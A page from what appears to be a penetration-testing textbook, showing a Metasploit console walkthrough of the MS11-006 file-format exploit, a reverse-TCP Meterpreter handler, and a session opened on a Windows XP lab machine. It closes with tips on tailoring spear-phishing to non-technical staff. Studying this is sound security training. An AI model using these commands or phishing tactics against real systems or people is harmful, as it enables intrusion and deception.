background image

Exploitation Using Client-Side Attacks

121

msf exploit(ms11_006_createsizeddibsection) > 

use multi/handler

msf exploit(handler) > 

set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > 

set LHOST 172.16.32.128

LHOST => 172.16.32.128
msf exploit(handler) > 

set LPORT 443

LPORT => 443
msf exploit(handler) > 

exploit -j

[*] Exploit running as background job.
[*] Started reverse handler on 172.16.32.128:443
[*] Starting the payload handler...
msf exploit(handler) >

We open the document on a Windows XP virtual machine, and we 

should be presented with a shell (provided our VM is Windows XP SP3):

msf exploit(handler) > 
[*] Sending stage (749056 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.131:2718) at 

Sun Apr 03 21:39:58 -0400 2011

msf exploit(handler) > 

sessions -i 1

[*] Starting interaction with 1...
meterpreter >

We have successfully exploited a file format vulnerability by creating a 

malicious document through Metasploit and then sending it to our targeted 
user. Looking back at this exploit, if we had performed proper reconnaissance 
on our target user, we could have crafted a pretty convincing email. This exploit 
is one example of a number of file format exploits available in Metasploit. 

Wrapping Up

We covered how client-side exploits generally work by manipulating the heap 
to work in the attacker’s favor. We covered how NOP instructions work within 
an attack and how to use the basics of a debugger. You’ll learn more about 
leveraging a debugger in Chapters 14 and 15. MS11-006 was a stack-based 
overflow, which we will cover in depth in later chapters. Note that your suc-
cess rate with these types of attacks resides in how much information you 
gain about the target before you attempt to perform the attacks. 

As a penetration tester, every bit of information can be used to craft an 

even better attack. In the case of spear-phishing, if you can talk the language 
of the company and target your attacks against smaller business units within 
the company that probably aren’t technical in nature, your chances of success 
greatly increase. Browser exploits and file format exploits are typically very 
effective, granted you do your homework. We’ll cover this topic in more 
detail in Chapters 8 and 10.